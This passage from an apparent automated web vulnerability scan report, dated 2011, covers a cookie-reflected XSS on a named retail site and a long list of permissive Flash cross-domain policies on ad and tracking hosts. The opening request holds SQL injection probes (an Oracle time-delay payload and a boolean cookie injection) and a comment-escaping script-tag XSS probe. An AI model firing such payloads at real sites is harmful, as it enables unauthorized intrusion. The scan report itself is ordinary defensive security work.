Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?itemType=CATEGORY&itemID=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)&path=1%2C2%2C195%2C241 HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e; cmTPSet=Y; PS_ALL=%23ps_catid%7E-1+or+17-7%253d10; s_cc=true; s_sq=%5B%5BB%5D%5Da3d4d--><script>alert(1)</script>26f91f30e7b; 90232094_clogin=l=1301080516&v=3&e=1301082325244

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:20:34 GMT
Server: Apache
ETag: "AAAAS7uc2DA"
Last-Modified: Fri, 25 Mar 2011 19:17:42 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 39295


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
cchr%28100%29%257c%257cchr%28105%29%257c%257cchr%28108%29%257c%257cchr%28101%29%257c%257cchr%28109%29%257c%257cchr%28109%29%257c%257cchr%2897%29%29%252c25%29+from+dual%29; s_cc=true; s_sq=%5B%5BB%5D%5Da3d4d--><script>alert(1)</script>26f91f30e7b; 90232094_clogin=l=1301080516&v=3&e=1301082340667; cmRS=t3=1301080538915&pi=ERROR
UNIQUE_ID: fPNiUqwSrRQAAG3Tu24AAAAE
SCRIPT_URL: /jump.jsp
SCRIPT_URI: https://www.territoryahead.com/jump.
...[SNIP]...
6. Flash cross-domain policy  previous  next
There are 32 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

6.1. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Fri, 25 Mar 2011 19:13:16 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
6.2. http://aka-cdn-ns.adtechus.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://aka-cdn-ns.adtechus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: aka-cdn-ns.adtechus.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 12 May 2010 09:39:46 GMT
Accept-Ranges: bytes
Content-Length: 111
Content-Type: text/xml
Cache-Control: max-age=141515
Expires: Mon, 28 Mar 2011 11:54:31 GMT
Date: Sat, 26 Mar 2011 20:35:56 GMT
Connection: close

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>
6.3. http://api.search.live.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.search.live.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.search.live.net

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Content-Length: 266
Content-Type: text/xml
Last-Modified: Tue, 09 Feb 2010 19:32:41 GMT
ETag: 68D294F3971D1719A2D5F7CCEEAC18F80000010A
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Sat, 26 Mar 2011 20:36:07 GMT
Connection: close
Set-Cookie: _MD=alg=m2&C=2011-03-26T20%3a36%3a07; expires=Tue, 05-Apr-2011 20:36:07 GMT; domain=.live.net; path=/
Set-Cookie: _SS=SID=2DB9D01009D44A2088F8BF513528D138; domain=.live.net; path=/
Set-Cookie: SRCHUID=V=2&GUID=F87E1B9F1DEB4B42A164763906F31065; expires=Mon, 25-Mar-2013 20:36:07 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110326; expires=Mon, 25-Mar-2013 20:36:07 GMT; domain=.live.net; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
6.4. http://at.atwola.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: at.atwola.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>
6.5. http://b.scorecardresearch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Sat, 26 Mar 2011 19:13:28 GMT
Date: Fri, 25 Mar 2011 19:13:28 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...
6.6. http://dominionenterprises.112.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dominionenterprises.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dominionenterprises.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:13:29 GMT
Server: Omniture DC/2.0.0
xserver: www93
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>
6.7. http://imagec17.247realmedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imagec17.247realmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: imagec17.247realmedia.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Fri, 30 Oct 2009 20:24:23 GMT
ETag: "100e7-d0-4772cd0408bc0"
Accept-Ranges: bytes
Content-Length: 208
Content-Type: text/xml
Date: Fri, 25 Mar 2011 19:13:23 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...
6.8. http://learn.shavlik.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: learn.shavlik.com

Response

HTTP/1.1 200 OK
Content-Length: 145
Content-Type: text/xml
Content-Location: http://learn.shavlik.com/crossdomain.xml
Last-Modified: Sun, 23 Aug 2009 19:48:53 GMT
Accept-Ranges: bytes
ETag: "4e3f9ebe2a24ca1:1772"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 25 Mar 2011 20:41:54 GMT
Connection: close

<?xml version="1.0"?>
<!-- http://www.foo.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
6.9. http://log30.doubleverify.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://log30.doubleverify.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: log30.doubleverify.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Sun, 17 Jan 2010 09:19:04 GMT
Accept-Ranges: bytes
ETag: "034d21c5697ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 20:36:37 GMT
Connection: close
Content-Length: 378

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
6.10. http://o.sa.aol.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://o.sa.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: o.sa.aol.com

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:35:54 GMT
Server: Omniture DC/2.0.0
xserver: www18
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>
6.11. http://oasc05139.247realmedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: oasc05139.247realmedia.com

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:13:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Fri, 10 Jul 2009 20:04:47 GMT
ETag: "11e009-d0-46e5f7bee35c0"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...
6.12. http://pixel.quantserve.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Sun, 27 Mar 2011 20:36:18 GMT
Content-Type: text/xml
Content-Length: 207
Date: Sat, 26 Mar 2011 20:36:18 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...
6.13. http://s0.2mdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Fri, 25 Mar 2011 11:46:38 GMT
Expires: Thu, 24 Mar 2011 11:46:37 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 26799
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
6.14. http://secure-us.imrworldwide.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:18 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Sat, 02 Apr 2011 20:36:18 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...
6.15. http://segment-pixel.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 26 Mar 2011 20:36:22 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>
6.16. http://wsjrs2.s3.amazonaws.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wsjrs2.s3.amazonaws.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: wsjrs2.s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/490793/1-wsj_110047_liberal_300x250_concept2_v7.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: /ygg2oiBHlK6v15qwV3Mlh9lLjFKvnbFUZOKSUEaSxZznqachH6OCbBqhJFiloe2
x-amz-request-id: 76651971862BC367
Date: Sat, 26 Mar 2011 20:36:25 GMT
Last-Modified: Tue, 30 Mar 2010 18:47:15 GMT
ETag: "0bac47246d36616ecd0dddf332b7b352"
Accept-Ranges: bytes
Content-Type: application/xml
Content-Length: 213
Server: AmazonS3

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><allow-access-from domain="*"/></cross-do
...[SNIP]...
6.17. http://www.econda-monitor.de/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.econda-monitor.de
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.econda-monitor.de

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"214-1265030770000"
Last-Modified: Mon, 01 Feb 2010 13:26:10 GMT
Content-Type: application/xml
Content-Length: 214
Date: Fri, 25 Mar 2011 20:43:40 GMT
Connection: keep-alive

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-d
...[SNIP]...
6.18. http://www.huffingtonpost.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.huffingtonpost.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.8 (Unix)
Last-Modified: Thu, 01 Jul 2010 13:55:20 GMT
ETag: "26e2850-fd-48a53d22e2200"
Content-Type: application/xml
Date: Sat, 26 Mar 2011 20:36:01 GMT
Content-Length: 253
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><allow-access-from domain="*" /><allow-http-request-headers
...[SNIP]...
6.19. http://ads.tw.adsonar.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.tw.adsonar.com

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:16 GMT
Server: Apache
Last-Modified: Tue, 07 Apr 2009 17:58:21 GMT
ETag: "a3d-466fac2afc940"
Accept-Ranges: bytes
Content-Length: 2621
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300, max=980
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="assets.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.quigo.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lonelyplanet.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mochila.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.conxise.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="app.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.digitalcity.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="cdn-startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channels.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channel.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.web.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.my.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.news.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="iamalpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="imakealpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " secure="false" />
...[SNIP]...
<allow-access-from domain="*.spinner.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.popeater.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.theboombox.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.opticalcortex.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yourminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.facebook.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.liveminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.lightningcast.com" to-ports="*" secure="false" />
...[SNIP]...
6.20. http://api.tweetmeme.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.tweetmeme.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.tweetmeme.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 26 Mar 2011 16:58:17 GMT
Content-Type: text/xml; charset='utf-8'
Connection: close
P3P: CP="CAO PSA"
Expires: Sat, 26 Mar 2011 16:58:53 +0000 GMT
Etag: fe9f3be2d9532deeab27f58209bf7be5
X-Served-By: h03

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.break.com" secure="true"/><allow-access-from domain="*.nextpt.com" secure="true"/>
...[SNIP]...
6.21. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Fri, 25 Mar 2011 11:46:53 GMT
Expires: Sat, 26 Mar 2011 11:46:53 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 26498
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...
